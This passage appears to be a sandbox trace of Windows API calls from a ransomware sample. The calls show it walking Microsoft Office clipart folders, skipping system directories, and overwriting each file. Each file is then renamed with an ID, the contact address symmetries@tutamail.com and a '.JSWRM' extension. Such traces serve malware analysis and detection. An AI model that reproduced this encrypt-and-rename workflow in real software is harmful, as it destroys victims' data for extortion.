24 [0079.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0079.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0079.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0079.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0079.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0079.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.603] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099148.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099148.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0079.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0079.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.604] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11dfe, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099149.WMF", cAlternateFileName="")) returned 1 [0079.604] lstrcmpiW (lpString1="J0099149.WMF", lpString2=".") returned 1 [0079.604] lstrcmpiW (lpString1="J0099149.WMF", lpString2="..") returned 1 [0079.604] lstrcmpiW (lpString1="J0099149.WMF", lpString2="...") returned 1 [0079.604] lstrcmpiW (lpString1="J0099149.WMF", lpString2="windows") returned -1 [0079.604] lstrcmpiW (lpString1="J0099149.WMF", lpString2="recovery") returned -1 [0079.604] lstrcmpiW (lpString1="J0099149.WMF", lpString2="perflogs") returned -1 [0079.604] lstrcmpiW (lpString1="J0099149.WMF", lpString2="documents and settings") returned 1 [0079.604] lstrcmpiW (lpString1="J0099149.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.604] lstrcmpiW (lpString1="J0099149.WMF", lpString2="system volume information") returned -1 [0079.604] lstrcmpiW (lpString1="J0099149.WMF", lpString2="msocache") returned -1 [0079.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0079.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099149.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099149.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099149.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0079.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0079.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099149.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099149.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099149.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0079.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0079.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0079.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0079.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099149.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.605] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=73214) returned 1 [0079.605] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11df0) returned 0x24d210 [0079.605] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x11df0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x11df0, lpOverlapped=0x0) returned 1 [0079.612] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.612] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x11df0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x11df0, lpOverlapped=0x0) returned 1 [0079.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.614] CloseHandle (hObject=0x314) returned 1 [0079.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0079.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0079.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0079.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0079.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0079.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.614] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099149.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099149.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099149.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0079.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0079.616] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x559a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099150.JPG", cAlternateFileName="")) returned 1 [0079.616] lstrcmpiW (lpString1="J0099150.JPG", lpString2=".") returned 1 [0079.616] lstrcmpiW (lpString1="J0099150.JPG", lpString2="..") returned 1 [0079.616] lstrcmpiW (lpString1="J0099150.JPG", lpString2="...") returned 1 [0079.616] lstrcmpiW (lpString1="J0099150.JPG", lpString2="windows") returned -1 [0079.616] lstrcmpiW (lpString1="J0099150.JPG", lpString2="recovery") returned -1 [0079.616] lstrcmpiW (lpString1="J0099150.JPG", lpString2="perflogs") returned -1 [0079.616] lstrcmpiW (lpString1="J0099150.JPG", lpString2="documents and settings") returned 1 [0079.616] lstrcmpiW (lpString1="J0099150.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.616] lstrcmpiW (lpString1="J0099150.JPG", lpString2="system volume information") returned -1 [0079.616] lstrcmpiW (lpString1="J0099150.JPG", lpString2="msocache") returned -1 [0079.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0079.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099150.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099150.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099150.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0079.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0079.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099150.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099150.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099150.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0079.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0079.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0079.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099150.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.617] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21914) returned 1 [0079.617] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5590) returned 0x24d210 [0079.618] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5590, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5590, lpOverlapped=0x0) returned 1 [0079.621] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.621] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5590, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5590, lpOverlapped=0x0) returned 1 [0079.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.621] CloseHandle (hObject=0x314) returned 1 [0079.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0079.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0079.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0079.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0079.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0079.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0079.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.622] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099150.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099150.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099150.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0079.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0079.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.623] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x65e6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099151.WMF", cAlternateFileName="")) returned 1 [0079.623] lstrcmpiW (lpString1="J0099151.WMF", lpString2=".") returned 1 [0079.623] lstrcmpiW (lpString1="J0099151.WMF", lpString2="..") returned 1 [0079.623] lstrcmpiW (lpString1="J0099151.WMF", lpString2="...") returned 1 [0079.623] lstrcmpiW (lpString1="J0099151.WMF", lpString2="windows") returned -1 [0079.623] lstrcmpiW (lpString1="J0099151.WMF", lpString2="recovery") returned -1 [0079.623] lstrcmpiW (lpString1="J0099151.WMF", lpString2="perflogs") returned -1 [0079.623] lstrcmpiW (lpString1="J0099151.WMF", lpString2="documents and settings") returned 1 [0079.623] lstrcmpiW (lpString1="J0099151.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.623] lstrcmpiW (lpString1="J0099151.WMF", lpString2="system volume information") returned -1 [0079.623] lstrcmpiW (lpString1="J0099151.WMF", lpString2="msocache") returned -1 [0079.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0079.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099151.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099151.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099151.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0079.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0079.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099151.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099151.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099151.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0079.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0079.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099151.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.624] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26086) returned 1 [0079.624] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x65e0) returned 0x24d210 [0079.624] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x65e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x65e0, lpOverlapped=0x0) returned 1 [0079.627] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.627] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x65e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x65e0, lpOverlapped=0x0) returned 1 [0079.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.627] CloseHandle (hObject=0x314) returned 1 [0079.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0079.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0079.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0079.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0079.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0079.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0079.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.628] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099151.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099151.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0079.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0079.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.629] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, 